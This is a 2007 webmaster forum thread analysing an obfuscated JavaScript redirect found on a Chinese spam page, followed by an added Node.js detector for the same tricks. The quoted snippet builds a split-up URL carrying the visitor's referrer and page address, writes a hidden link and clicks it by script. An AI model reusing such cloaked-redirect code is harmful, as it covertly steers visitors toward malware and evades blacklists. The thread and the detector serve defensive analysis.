What the Heck is This?

I KNOW It's Nefarious, but Can't Figure Out How.

         

cmarshall

3:49 am on Sep 2, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I came across a Web page full of nonsense (at a .cn TLD).

It had a JavaScript include, and that file had something like this:

exgo='h' + 't' + 't' + 'p://' + 'example' + '.com/in.p' + 'hp?id=2&ul=1&ref_s='+encodeURIComponent(document.referrer)+'&ref_d='+encodeURIComponent(document.URL);
document.write('<a href="'+exgo+'" id="xyz" target="_self" style=display:none>click here</a>');window.open("", "_self");
document.getElementById("xyz").click();

It LOOKS like harmless tracking code, but the deliberate URL obfuscation tells me it's naughty.

It wasn't "example.com". It was a .name domain.

Anyone have any explanation?

nowpc

10:21 pm on Sep 3, 2007 (gmt 0)

10+ Year Member



You probably know that the code is creating a link on the page that is not visible to the user and is automatically clicked, opening a popup. I'm not sure if all that obfuscation will hide the link from pop-up blockers - I wouldn't have thought so. It'll hide it from spiders, though, possibly preventing the page losing SE value due to poor site linking. That's all I got. :)

cmarshall

10:46 pm on Sep 3, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Yeah, that's what the code says. It didn't work on my browser, though. I have FF2/Mac and I didn't even get a blocked popup warning; just a page full of gibberish.

nowpc

10:58 pm on Sep 3, 2007 (gmt 0)

10+ Year Member



Hmm, well looking at it a bit closer, the script isn't writing to a popup, it's writing to the existing page. The style rule won't work because it's not in quotes. Now I'm wondering if it's trying to crash the browser by filling the page with gibberish forever - but invisibly, if the style rule worked.

cmarshall

12:00 am on Sep 4, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



I think I just figured it out.

It generates a link back to the site that is not "example.com." That site contains a "Funny Videos" page. I suspect it's a malware distributor.

nowpc

8:45 am on Sep 4, 2007 (gmt 0)

10+ Year Member



Yes, looks like you've got it. It's an attempt at a cloaked redirect isn't it, but a bust one because it's bad code.

cmarshall

5:01 pm on Sep 4, 2007 (gmt 0)

WebmasterWorld Senior Member 10+ Year Member



Okay, now it clicks into place.

The page full of gibberish is a "Google magnet." It pushes the page high (it was one of the first hits in a search - I can't remember what for). The absence of valid URIs in the page means that Google won't think it's a link farm page, and won't be able to match the URI against a blacklist.

The JS is supposed to force a redirect to their naughty page, when you click on the link that shows up in Google.
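
Added example, not part of the original thread and not written by any poster: a small Node.js static check for the three traits the thread identifies, namely a URL split across string literals, a hidden anchor emitted with document.write, and a scripted click. The function names and finding labels are hypothetical; the sample input is the snippet from the first post, with the poster's example.com placeholder.

```javascript
// Sample input: the snippet quoted in the first post (example.com is the poster's placeholder).
const SAMPLE = `exgo='h' + 't' + 't' + 'p://' + 'example' + '.com/in.p' + 'hp?id=2&ul=1&ref_s='+encodeURIComponent(document.referrer)+'&ref_d='+encodeURIComponent(document.URL);
document.write('<a href="'+exgo+'" id="xyz" target="_self" style=display:none>click here</a>');window.open("", "_self");
document.getElementById("xyz").click();`;

// Walk the string literals left to right and merge those joined only by '+',
// so 'h' + 't' + 't' + 'p://' is seen as the single string it becomes at runtime.
// Simplification (assumption): comments and regex literals are not parsed.
function foldedStrings(src) {
  const lit = /'(?:[^'\\]|\\.)*'|"(?:[^"\\]|\\.)*"/g;
  const runs = [];
  let prevEnd = -1, m;
  while ((m = lit.exec(src)) !== null) {
    const text = m[0].slice(1, -1);
    const joined = prevEnd >= 0 && /^\s*\+\s*$/.test(src.slice(prevEnd, m.index));
    if (joined) {
      const run = runs[runs.length - 1];
      run.value += text;
      run.pieces += 1;
    } else {
      runs.push({ value: text, pieces: 1 });
    }
    prevEnd = lit.lastIndex;
  }
  return runs;
}

// Report the traits discussed in the thread. Finding labels are hypothetical.
function triage(src) {
  const runs = foldedStrings(src);
  const split = runs.find(r => r.pieces > 1 && /^https?:\/\//i.test(r.value));
  const findings = [];
  // The URL exists only after concatenation, so a plain-text URL or blacklist match misses it.
  if (split && !/https?:\/\//i.test(src)) findings.push("url-split-across-literals");
  // Anchor written into the page with display:none (quoted or unquoted style value).
  if (/document\.write\s*\(/.test(src) &&
      runs.some(r => /<a\b/i.test(r.value)) &&
      runs.some(r => /display\s*:\s*none/i.test(r.value))) findings.push("hidden-anchor-written");
  // The script clicks an element itself instead of waiting for the user.
  if (/\.click\s*\(\s*\)/.test(src)) findings.push("scripted-click");
  return { url: split ? split.value : null, findings };
}

console.log(triage(SAMPLE));
```

A script that builds a URL from a literal already containing the scheme, such as "http://example.org/" + "page", produces no findings, because the first check only fires when the address is absent from the raw source.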